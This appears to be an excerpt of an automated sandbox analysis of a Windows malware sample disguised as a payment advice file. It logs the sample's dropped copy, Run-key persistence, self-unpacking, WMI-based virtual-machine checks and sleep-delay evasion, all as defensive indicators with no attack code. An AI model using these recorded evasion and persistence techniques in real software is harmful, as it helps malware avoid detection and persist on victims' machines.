                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCommand line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCommand line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeCommand line argument: 08A
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: USD67,884.08_Payment_Advise_9083008849.exeVirustotal: Detection: 40%
                      Source: USD67,884.08_Payment_Advise_9083008849.exeReversingLabs: Detection: 22%
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile read: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe 'C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Binary string: _.pdb source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeUnpacked PE file: 18.2.Uclldrv.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeUnpacked PE file: 18.2.Uclldrv.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED2BC8 push 0040547Ch; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED63C4 push 00408CBBh; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED2BC6 push 0040547Ch; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED63C2 push 00408CBBh; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED6B9C push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED6244 push 00408C48h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC4A28 push 00404FE9h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED2A28 push 004052DCh; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED29EE push 004052A4h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED29F0 push 004052A4h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECA1D8 push 14004056h; retn 0040h
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECC1AC push 0040A2B5h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC5198 push 00405734h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECC124 push 0040A1F2h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECC122 push 0040A1F2h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC87CC push 00408D60h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC87C4 push 00408D60h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC87C2 push 00408D60h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC878C push 00408D20h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC8784 push 00408D20h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC8782 push 00408D20h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC5F60 push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC4F18 push 00405734h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ED2710 push 00404FE9h; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC4EE8 push 0040547Ch; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC4EE0 push 0040547Ch; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC86DC push 00408CBBh; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC4EDE push 0040547Ch; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC86DA push 00408CBBh; ret
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03ECC6A0 push 14004056h; retn 0040h
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 0_3_03EC8EB4 push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeJump to dropped file
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UcllJump to behavior
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UcllJump to behavior
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exeWindow / User API: threadDelayed 661
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exeWindow / User API: threadDelayed 471
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 6140Thread sleep count: 32 > 30
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 6140Thread sleep count: 661 > 30
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -59500s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -59312s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -58906s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -58406s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -58218s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -57812s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -57312s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -56906s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -56718s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -56218s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -55812s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -55594s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -54906s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -54718s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -53812s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -53594s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -53406s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -53218s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -52718s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -52312s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -51406s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -51218s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -51000s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -50094s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -49718s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -49218s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -49000s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -48812s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -48594s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -47500s >= -30000s
                      Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe TID: 1124Thread sleep time: -46812s >= -30000s
